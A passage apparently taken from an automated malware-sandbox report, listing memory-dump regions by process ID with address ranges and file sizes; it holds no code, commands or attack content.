                                                                                                                • memory/2148-319-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2212-354-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2248-203-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2248-223-0x0000000004D30000-0x0000000004D31000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/2248-221-0x0000000004D40000-0x0000000004D41000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/2368-175-0x000001B8B0BA0000-0x000001B8B0C10000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/2388-177-0x0000015BBB140000-0x0000015BBB1B0000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/2604-162-0x0000029CE8300000-0x0000029CE8370000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/2664-202-0x000000000A4B0000-0x000000000A4B1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/2664-198-0x000000000A9B0000-0x000000000A9B1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/2664-191-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2664-197-0x0000000002A50000-0x0000000002A5E000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  56KB

                                                                                                                • memory/2664-194-0x00000000007F0000-0x00000000007F1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/2664-196-0x0000000002A40000-0x0000000002A41000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/2664-201-0x000000000A550000-0x000000000A551000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/2700-168-0x0000028873F30000-0x0000028873FA0000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/2716-174-0x000001E9E0F00000-0x000001E9E0F70000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/2772-232-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2772-235-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/3004-331-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3308-228-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3308-230-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  88KB

                                                                                                                • memory/3472-249-0x00000000011E0000-0x00000000011E2000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/3472-260-0x00000000011E5000-0x00000000011E7000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/3472-241-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3472-258-0x00000000011E2000-0x00000000011E4000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/3472-259-0x00000000011E4000-0x00000000011E5000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/3512-288-0x00000001402CA898-mapping.dmp
                                                                                                                • memory/3512-292-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  7.0MB

                                                                                                                • memory/3512-307-0x0000012C48270000-0x0000012C48290000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  128KB

                                                                                                                • memory/3512-291-0x0000012C48230000-0x0000012C48244000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  80KB

                                                                                                                • memory/3512-287-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  7.0MB

                                                                                                                • memory/3880-213-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3880-215-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  172KB

                                                                                                                • memory/3884-298-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3904-269-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3904-281-0x0000000003EE0000-0x000000000402A000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  1.3MB

                                                                                                                • memory/3996-218-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3996-222-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/4008-227-0x0000000002F70000-0x0000000002F72000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/4008-224-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4044-242-0x0000000002FB0000-0x0000000002FB2000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/4044-236-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4152-284-0x0000000003660000-0x00000000036A8000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  288KB

                                                                                                                • memory/4152-251-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4152-254-0x0000000000B20000-0x0000000000B2D000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  52KB

                                                                                                                • memory/4152-359-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4212-310-0x0000000000030000-0x000000000003C000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  48KB

                                                                                                                • memory/4212-304-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4268-313-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4336-275-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4416-367-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4448-290-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4660-279-0x0000000000401480-mapping.dmp
                                                                                                                • memory/4660-278-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  284KB

                                                                                                                • memory/4660-282-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  284KB

                                                                                                                • memory/4756-299-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4804-263-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4820-366-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4824-308-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  48KB

                                                                                                                • memory/4824-309-0x0000000000402F68-mapping.dmp
                                                                                                                • memory/4852-365-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4960-264-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4960-315-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5028-321-0x0000000000400000-0x0000000002BF4000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  40.0MB

                                                                                                                • memory/5028-320-0x0000000004900000-0x0000000004991000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  580KB

                                                                                                                • memory/5028-300-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5036-361-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5048-353-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5080-293-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5084-286-0x00000001401FBC30-mapping.dmp
                                                                                                                • memory/5084-289-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  3.5MB

                                                                                                                • memory/5084-285-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  3.5MB

                                                                                                                • memory/5088-303-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5092-273-0x00000000008B0000-0x00000000008C2000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  72KB

                                                                                                                • memory/5092-266-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5092-272-0x0000000000880000-0x0000000000890000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/5212-350-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5224-334-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5348-339-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5372-352-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5400-345-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/5400-346-0x0000000000490000-0x00000000004A2000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  72KB

                                                                                                                • memory/5400-342-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5460-344-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5560-347-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5560-348-0x0000000000030000-0x0000000000039000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  36KB

                                                                                                                • memory/5696-349-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5732-368-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5756-351-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5760-363-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5776-360-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5832-358-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5944-355-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5960-364-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5988-369-0x0000000000000000-mapping.dmp
                                                                                                                • memory/6072-362-0x0000000000000000-mapping.dmp
                                                                                                                • memory/6092-356-0x0000000000000000-mapping.dmp